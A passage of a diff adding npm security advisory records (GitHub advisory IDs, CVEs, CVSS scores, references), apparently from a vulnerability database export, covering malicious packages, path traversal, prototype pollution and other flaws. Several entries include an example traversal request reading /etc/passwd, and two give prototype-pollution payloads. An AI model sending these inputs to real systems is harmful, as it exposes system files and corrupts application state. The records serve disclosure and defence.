+
+## Recommendation
+
+Upgrade to version 3.1.0 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'cordova-plugin-inappbrowser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0219'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/197482d5ab80c0bff4a5ec16e1b0466df38389d9a4b5331d777f14fc%40%3Cdev.cordova.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/4vtg0trdrh5203dktt4f3vkd5z2d5ndj'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1467'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2019/11/28/1'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:21Z', 'nvd_published_at': '2020-01-14T15:15:00Z'}"
+1.4.0,GHSA-mmph-wp49-r48h,2021-10-01T14:02:46Z,2020-09-02T20:20:26Z,,[],Malicious Package in experss,"All versions of `experss` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'experss'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/852'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:11Z', 'nvd_published_at': None}"
+1.4.0,GHSA-g64q-3vg8-8f93,2021-10-04T20:58:50Z,2020-09-03T15:47:10Z,,[],Prototype Pollution in subtext,"All versions of `subtext` are vulnerable to Prototype Pollution. A multipart payload can be constructed in a way that one of the parts’ content can be set as the entire payload object’s prototype. If this prototype contains data, it may bypass other validation rules which enforce access and privacy. If this prototype evaluates to null, it can cause unhandled exceptions when the request payload is accessed.
+
+
+## Recommendation
+
+This package is deprecated and is now maintained as `@hapi/subtext`. Please update your dependencies to use `@hapi/subtext`. ",[],"[{'package': {'ecosystem': 'npm', 'name': 'subtext'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1479'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:00:49Z', 'nvd_published_at': None}"
+1.4.0,GHSA-v6gv-fg46-h89j,2020-08-31T18:43:51Z,2020-09-03T16:48:36Z,,[],Sensitive Data Exposure in put,"All versions of `put` are vulnerable to Uninitialized Memory Exposure. The package incorrectly calculates the allocated Buffer size and does not trim the bytes written, which may allow attackers to access uninitialized memory containing sensitive data. This vulnerability only affects versions of Node.js <=6.x.
+
+
+## Recommendation
+
+Upgrade your Node.js version or consider using an alternative package.",[],"[{'package': {'ecosystem': 'npm', 'name': 'put'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/321702'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1007'}]","{'cwe_ids': ['CWE-200'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:43:51Z', 'nvd_published_at': None}"
+1.4.0,GHSA-gwpf-62xp-vrg6,2021-09-28T16:53:04Z,2020-09-11T21:14:49Z,,['CVE-2016-6799'],Information Exposure in cordova-android,"Versions of `cordova-android` prior to 6.0.0 are vulnerable to Information Exposure through log files. The application calls methods of the Log class. Messages passed to these methods (Log.v(), Log.d(), Log.i(), Log.w(), and Log.e()) are stored in a series of circular buffers on the device. By default, a maximum of four 16 KB rotated logs are kept in addition to the current log. The logged data can be read using Logcat on the device. When using platforms prior to Android 4.1 (Jelly Bean), the log data is not sandboxed per application; any application installed on the device has the capability to read data logged by other applications.
+
+
+## Recommendation
+
+Upgrade to version 6.0.0 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'cordova-android'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-6799'}, {'type': 'WEB', 'url': 'https://github.com/apache/cordova-android/commit/4a0a7bc424fae14c9689f4a8a2dc250ae3a47f82'}, {'type': 'WEB', 'url': 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6799'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/cordova-android'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/1f3e7b0319d64b455f73616f572acee36fbca31f87f5b2e509c45b69@%3Cdev.cordova.apache.org%3E'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CORDOVAANDROID-174935'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/964'}, {'type': 'WEB', 'url': 'http://www.securityfocus.com/bid/98365'}]","{'cwe_ids': ['CWE-532'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:42:13Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f8rj-4v7g-p5rj,2023-09-07T21:55:43Z,2020-09-01T18:53:29Z,,['CVE-2017-16176'],Directory Traversal in jansenstuffpleasework,"Affected versions of `jansenstuffpleasework` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jansenstuffpleasework'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16176'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/jansenstuffpleasework'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/464'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:24:07Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m2mx-rfpw-jghv,2023-08-21T19:57:14Z,2020-09-04T18:01:59Z,,['CVE-2020-13110'],DLL Injection in kerberos,"Version of `kerberos` prior to 1.0.0 are vulnerable to DLL Injection. The package loads DLLs without specifying a full path. This may allow attackers to create a file with the same name in a folder that precedes the intended file in the DLL path search. Doing so would allow attackers to execute arbitrary code in the machine.
+
+
+## Recommendation
+
+Upgrade to version 1.0.0 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'kerberos'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13110'}, {'type': 'PACKAGE', 'url': 'https://github.com/mongodb-js/kerberos'}, {'type': 'WEB', 'url': 'https://medium.com/@kiddo_Ha3ker/dll-injection-attack-in-kerberos-npm-package-cb4b32031cd'}, {'type': 'WEB', 'url': 'https://www.linkedin.com/posts/op-innovate_dll-injection-attack-in-kerberos-npm-package-activity-6667043749547253760-kVlW'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1514'}, {'type': 'WEB', 'url': 'https://www.op-c.net/2020/05/15/dll-injection-attack-in-kerberos-npm-package/'}]","{'cwe_ids': ['CWE-427'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:01:58Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6x8c-mvpv-5366,2023-09-07T20:43:08Z,2020-09-01T18:18:32Z,,['CVE-2017-16147'],Directory Traversal in shit-server,"Affected versions of `shit-server` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'shit-server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16147'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/shit-server'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/430'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:22:50Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2mvq-xp48-4c77,2021-09-29T18:37:04Z,2020-09-03T20:35:29Z,,[],Denial of Service in subtext,"All versions of `subtext` are vulnerable to Denial of Service (DoS). The package fails to enforce the `maxBytes` configuration for payloads with chunked encoding that are written to the file system. This allows attackers to send requests with arbitrary payload sizes, which may exhaust system resources leading to Denial of Service.
+
+
+## Recommendation
+
+This package is not actively maintained and has been moved to `@hapi/subtext` where version 6.1.2.",[],"[{'package': {'ecosystem': 'npm', 'name': 'subtext'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/hapijs/subtext/issues/72'}, {'type': 'PACKAGE', 'url': 'https://github.com/hapijs/subtext'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1168'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:49:45Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p2r2-h92r-w2mg,2023-09-05T22:46:22Z,2020-09-01T18:11:03Z,,['CVE-2017-16213'],Directory Traversal in mfrserver,"Affected versions of `mfrserver` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.",[],"[{'package': {'ecosystem': 'npm', 'name': 'mfrserver'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16213'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/mfrserver'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/421'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:22:29Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5g4r-87v2-jqvx,2020-08-31T18:14:17Z,2020-09-01T16:05:44Z,,['CVE-2016-10564'],Downloads Resources over HTTP in apk-parser,"apk-parser is a tool to extract Android Manifest info from an APK file.
+
+apk-parser versions below 0.1.6 download binary resources over HTTP, which leaves it vulnerable to MITM attacks. It may be possible to cause remote code execution (RCE) by swapping out the requested binary with an attacker controlled binary if the attacker is on the network or positioned in between the user and the remote server.
+
+
+## Recommendation
+
+Update to version 0.1.6 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'apk-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-10564'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/195'}]","{'cwe_ids': ['CWE-311'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:14:17Z', 'nvd_published_at': None}"
+1.4.0,GHSA-pv55-r6j3-wp94,2023-07-27T00:04:06Z,2020-09-01T20:45:57Z,,[],Malicious Package in eslint-config-eslint,"Version 5.0.2 of `eslint-config-eslint` was published without authorization and was found to contain malicious code. This code would read the users `.npmrc` file and send any found authentication tokens to a remote server.
+
+
+## Recommendation
+
+The best course of action if you found this package installed in your environment is to revoke all your npm tokens. You can find instructions on how to do that here. https://docs.npmjs.com/getting-started/working_with_tokens#how-to-revoke-tokens
+
+Users may consider downgrading to version 5.0.1",[],"[{'package': {'ecosystem': 'npm', 'name': 'eslint-config-eslint'}, 'versions': ['5.0.2']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/674'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:32:17Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h44f-769q-j6px,2021-10-01T14:08:15Z,2020-09-02T20:33:14Z,,[],Malicious Package in requet,"All versions of `requet` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
+
+
+## Recommendation
+
+Remove the package from your dependencies and always ensure package names are typed correctly upon installation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'requet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/864'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:38:38Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wgw3-gf4p-62xc,2020-08-31T18:42:46Z,2020-09-11T21:16:59Z,,[],Command Injection in wizard-syncronizer,"All versions of `wizard-syncronizer` are vulnerable to Command Injection. The package does not validate input on the `cloneAndSync` function and concatenates it to an exec call. This can be abused through a malicious widget containing the payload in the `gitURL` value or through a MITM attack since the package does not enforce HTTPS. This may allow attackers to run arbitrary commands in the system.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative module until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'wizard-syncronizer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/977'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:42:46Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4r5x-qjqc-p579,2021-09-23T21:47:44Z,2020-09-01T18:57:44Z,,['CVE-2017-16126'],Tracking Module in botbait,"The module `botbait` is a tool to be used to track bot and automated tools usage with-in the npm ecosystem.
+
+`botbait` is known to record and track user information.
+
+The module tracks the following information.
+- Source IP
+- process.versions
+- process.platform
+- How the module was invoked (test, require, pre-install)
+
+
+## Recommendation
+
+This package has no functional value, and should be removed from your environment if discovered.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'botbait'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16126'}, {'type': 'WEB', 'url': 'https://web.archive.org/web/20210120201359/https://www.npmjs.com/advisories/483'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:24:52Z', 'nvd_published_at': None}"
+1.4.0,GHSA-pp7h-53gx-mx7r,2022-05-26T20:43:51Z,2020-09-02T15:26:19Z,,['CVE-2020-8244'],Remote Memory Exposure in bl,"A buffer over-read vulnerability exists in bl <4.0.3, <3.0.1, <2.2.1, and <1.2.3 which could allow an attacker to supply user input (even typed) that if it ends up in consume() argument and can become negative, the BufferList state can be corrupted, tricking it into exposing uninitialized memory via regular .slice() calls.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'bl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'bl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.2.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'bl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.1'}]}], 'versions': ['3.0.0']}, {'package': {'ecosystem': 'npm', 'name': 'bl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8244'}, {'type': 'WEB', 'url': 'https://github.com/rvagg/bl/commit/8a8c13c880e2bef519133ea43e0e9b78b5d0c91e'}, {'type': 'WEB', 'url': 'https://github.com/rvagg/bl/commit/d3e240e3b8ba4048d3c76ef5fb9dd1f8872d3190'}, {'type': 'WEB', 'url': 'https://github.com/rvagg/bl/commit/dacc4ac7d5fcd6201bcf26fbd886951be9537466'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/966347'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/06/msg00028.html'}]","{'cwe_ids': ['CWE-125', 'CWE-126'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-02T15:26:05Z', 'nvd_published_at': '2020-08-30T15:15:00Z'}"
+1.4.0,GHSA-c3px-v9c7-m734,2020-08-31T18:47:02Z,2020-09-03T19:04:39Z,,[],Prototype Pollution in mithril,"Affected versions of `mithril`are vulnerable to prototype pollution. The function `parseQueryString` may allow a malicious user to modify the prototype of `Object`, causing the addition or modification of an existing property that will exist on all objects. A payload such as `__proto__%5BtoString%5D=123` in the query string would change the `toString()` function to `123`.
+
+
+
+## Recommendation
+
+If you are using mithril 2.x, upgrade to version 2.0.2 or later.
+If you are using mithril 1.x, upgrade to version 1.1.7 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'mithril'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.7'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'mithril'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1094'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:47:02Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p9pc-299p-vxgp,2022-08-02T21:44:02Z,2020-09-04T18:00:54Z,,['CVE-2020-7608'],yargs-parser Vulnerable to Prototype Pollution,"Affected versions of `yargs-parser` are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of `Object`, causing the addition or modification of an existing property that will exist on all objects.
+Parsing the argument `--foo.__proto__.bar baz'` adds a `bar` property with value `baz` to all objects. This is only exploitable if attackers have control over the arguments being passed to `yargs-parser`.
+
+
+
+## Recommendation
+
+Upgrade to versions 13.1.2, 15.0.1, 18.1.1 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'yargs-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '13.1.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'yargs-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0.0'}, {'fixed': '15.0.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'yargs-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '16.0.0'}, {'fixed': '18.1.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'yargs-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.0.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7608'}, {'type': 'WEB', 'url': 'https://github.com/yargs/yargs-parser/commit/1c417bd0b42b09c475ee881e36d292af4fa2cc36'}, {'type': 'WEB', 'url': 'https://github.com/yargs/yargs-parser/commit/63810ca1ae1a24b08293a4d971e70e058c7a41e2'}, {'type': 'PACKAGE', 'url': 'https://github.com/yargs/yargs-parser'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-YARGSPARSER-560381'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1500'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:01:32Z', 'nvd_published_at': '2020-03-16T20:15:00Z'}"
+1.4.0,GHSA-4p7j-5ppx-rfhm,2021-01-07T23:32:43Z,2020-09-01T16:06:49Z,,['CVE-2016-10574'],Downloads Resources over HTTP in apk-parser3,"Affected versions of `apk-parser3` insecurely download an executable over an unencrypted HTTP connection.
+
+In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `apk-parser3`.
+
+
+## Recommendation
+
+Update to version 0.1.3 or greater.",[],"[{'package': {'ecosystem': 'npm', 'name': 'apk-parser3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-10574'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/245'}]","{'cwe_ids': ['CWE-311'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:16:15Z', 'nvd_published_at': None}"
+1.4.0,GHSA-rv6q-p3x7-43fx,2021-10-01T20:42:01Z,2020-09-04T16:37:50Z,,[],Malicious Package in bitcoimjs-lib,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bitcoimjs-lib'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1364'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:56:32Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f2rc-6xjq-95gq,2023-09-13T23:05:56Z,2020-09-01T17:24:57Z,,['CVE-2017-16161'],Directory Traversal in shenliru,"Affected versions of `shenliru` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'shenliru'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16161'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/shenliru'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/389'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:21:26Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4x7w-frcq-v4m3,2020-08-31T18:49:56Z,2020-09-03T20:38:47Z,,[],Path Traversal in @wturyn/swagger-injector,"All versions of `@wturyn/swagger-injector` are vulnerable to Path Traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the configured `dist` folder using relative paths.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': '@wturyn/swagger-injector'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1173'}]","{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:49:56Z', 'nvd_published_at': None}"
+1.4.0,GHSA-mj87-8xf8-fp4w,2020-08-31T18:19:38Z,2020-09-01T16:42:51Z,,['CVE-2013-4939'],Cross-Site Scripting in yui,"Affected versions of `yui` are vulnerable to cross-site scripting in the `uploader.swf` and `io.swf` utilities, via script injection in the url.
+
+
+
+## Recommendation
+
+YUI has published their recommendation to fix this issue.
+Their recommendation is to:
+ - Delete self-hosted copies of these files if you are not using them
+ - Use the Yahoo! CDN hosted files
+ - Use the patched files provided on the YUI Library [here](https://yuilibrary.com/support/20130515-vulnerability/#resolution).",[],"[{'package': {'ecosystem': 'npm', 'name': 'yui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.10.3'}]}], 'database_specific': {'last_known_affected_version_range': '< 3.10.2'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2013-4939'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/72837f969cdf9b63a7e7337edd069fa3b3950eea7c997cc2ff61aa0c@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/d8b9403dbab85a51255614949938b619bd03b1c944c76c48c6996a0e@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=232496'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/332'}, {'type': 'WEB', 'url': 'https://yuilibrary.com/support/20130515-vulnerability/'}, {'type': 'WEB', 'url': 'http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-39678'}, {'type': 'WEB', 'url': 'http://yuilibrary.com/support/20130515-vulnerability/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:19:38Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6xg2-cf6h-x4v8,2021-09-29T20:58:54Z,2020-09-03T21:53:05Z,,[],Malicious Package in buffer-por,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
